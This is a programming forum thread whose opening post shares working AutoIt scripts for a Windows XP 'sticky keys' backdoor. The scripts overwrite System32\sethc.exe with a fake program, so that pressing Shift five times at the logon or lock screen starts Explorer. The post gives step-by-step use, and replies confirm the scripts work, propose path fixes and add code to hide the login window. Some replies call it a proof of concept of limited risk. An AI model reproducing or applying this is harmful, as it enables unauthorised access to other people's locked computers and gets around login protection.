Sign in to follow this  
Followers 0
JellyFish666

WinHack

10 posts in this topic

#1 ·  Posted (edited)

I am not sure if I am allowed sharing it if not I shouldn't post my other scripts :P

What does this do?

- well this is a exploit that takes advantage of Windows "sticky key function" (note sticky keys needs to be turned on)

How does this work?

- when your logged off on your computer "sticky keys function" is still active so by replacing this file with a fake "sticky key function" you can do whatever you want WOW!

Give me a Example

- Run the Injector.au3

- click Enable

- Logoff (were you enter your password)

- hit shift x5 (may be more) if it doesn't work you need to enable "sticky keys"

then the Attack.au3 will launch explorer.exe and if you hit CRTL-ALT-DELETE it should show you another type of window asking for password (old school login) but just let it sit there and don't touch it and you should be able to access your desktop...

DO NOT FORGET TO DISABLE - my attack.au3 only opens up explorer but if you add your own script and "sticky key" the attack will launch...

ONLY TESTED ON WINXP

Injector.au3

If Not FileExists(@ScriptDir & "\Real.exe") Then
    FileCopy(@HomeDrive & "\Windows\System32\sethc.exe" , @ScriptDir & "\Real.exe")
EndIf

#include <GUIConstantsEx.au3>
#include <WindowsConstants.au3>
$Restore = GUICreate("Restore", 200, 25)
$Enable = GUICtrlCreateButton("Enable", 0, 0, 100, 25, 0)
$Disable = GUICtrlCreateButton("Disable", 100, 0, 100, 25, 0)
GUISetState(@SW_SHOW)

While 1
    $Msg = GUIGetMsg()
    Switch $Msg
        Case $GUI_EVENT_CLOSE
            Exit
        Case $Enable
            GUICtrlSetState($Enable , $GUI_DISABLE)
            FileDelete(@HomeDrive & "\Windows\System32\sethc.exe")
            FileCopy(@ScriptDir & "\Fake.exe" , @HomeDrive & "\Windows\System32\sethc.exe" , 1)
            Exit
        Case $Disable 
            GUICtrlSetState($Disable , $GUI_DISABLE)
            FileDelete(@HomeDrive & "\Windows\System32\sethc.exe")
            FileCopy(@ScriptDir & "\Real.exe" , @HomeDrive & "\Windows\System32\sethc.exe" , 1)
            Exit
    EndSwitch
WEnd

Attack.au3

Run("Explorer.exe")

I changed the pictures a bit but they will give you an idea

Posted Image

TaskBar on log on screen and if you push CTRL-ALT-DELETE you will get your desktop :P

Posted Image

I hid my icons of course for safety reasons

Edited by JellyFish666

Share this post


Link to post
Share on other sites



I just gave this a try and I have to admit, scary and cool.

The File Protection complains about replacing the file. Pressing Shift 5 times dose indeed initialize Explorer while the system is "Locked". It dose not however place focus to explorer as the locked screen is still dominate. I'm sure this can be somehow worked around.

I see this example to demonstrate a possible security risk to Windows. To possibly allow a passerby to "Shift" there way into a locked system, as an example. I don't consider this a pressing matter as the system must already be compromised to install this hack. Thus making this exploit more of a novelty than a genuine threat.

I'm running this on an XP SP2 x86 system with up to date system patches.


--- TTFN

Share this post


Link to post
Share on other sites

#3 ·  Posted (edited)

How about you rename it as a "Proof-of-Concept". Because we know you would never actually use this. Other than that, good job on the exploit.

Edit: As far as the actual exploit goes, I don't see any risk at all. Basically the point of hacking is to get your code running on their machine. But if you can get an executable all the way to their system folders than you can just put it in their startup folder. Or somthing else. On another note however I could se this being useful as a fun way to start up a launcher program you make or somthing similer.

Edited by BillLuvsU

[center][/center]Working on the next big thing.Currently Playing: Halo 4, League of LegendsXBL GT: iRememberYhslaw

Share this post


Link to post
Share on other sites

Could you close the winlogin window?

Just tried it... caused the systems to BSOD and reboot.


--- TTFN

Share this post


Link to post
Share on other sites

Hi

FileDelete(@HomeDrive & "\Windows\System32\sethc.exe")

Better to write ( FilseDlete(@SystemDir & "\sethc.exe"))

Bye ... :P


[center]I LOVE ALGERIA .... ;-)[/center]

Share this post


Link to post
Share on other sites

#7 ·  Posted (edited)

To bypass the screen once you see your Taskbar push "Ctrl-Alt-Delete" and Success

I just called it a hack and people misuse that word I was meaning a different kind of hacker and yes this could be good and bad but I only see good coming from it I mean sure you could write a virus but Autoit doesn't really have a way of running unless your virus activates on "Sticky Keys" lol

Replacing the @HomeDrive Macro is smart didn't think of it at the time start this short project early in the morning with no sleep.

The File Protection complains about replacing the file

- what OS

- what Anti Virus

- what file protection (windows?)

A good use and may be shouldn't be tried but would be nice... if someone is letting you use there computer Enable this script and you can access their computer you are sort of limited because of the log on screen (I know how to disable it but not releasing that I wasn't even going to release this...)

Could you close the winlogin window?

Just tried it... caused the systems to BSOD and reboot.

lol yes it takes more than killing processes at least the way I do it...

{==Edited==}

Last time ill edit this post lol, I just got back from work but later I might show a good example of using this I got lots of idea's

Edited by JellyFish666

Share this post


Link to post
Share on other sites

can you HIDE the login window? :P


My Projects - WindowDarken (Darken except the active window) Yahsmosis Chat Client (Discontinued) StarShooter Game (Red alert! All hands to battlestations!) YMSG Protocol Support (Discontinued) Circular Keyboard and OSK example. (aka Iris KB) Target Screensaver Drive Toolbar Thingy Rollup Pro (Minimize-to-Titlebar & More!) 2D Launcher physics example Ascii Screenshot AutoIt3 Quine Example ("Is a Quine" is a Quine.) USB Lock (Another system keydrive - with a toast.)

Share this post


Link to post
Share on other sites

can you HIDE the login window? :P

better yet you can disable it :P

Share this post


Link to post
Share on other sites

#10 ·  Posted (edited)

WinSetState("Log on to Windows","",@SW_HIDE)

WinSetState("Log on to Windows","",@SW_DISABLE) ;Don't use DISABLE... It leaves the window apparent, and simply disabled input to that window...

Either This should work seamlessly... :P

I'm for helping people... Even if it really isn't 'helping'.. :P

Edited by BinaryBrother

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0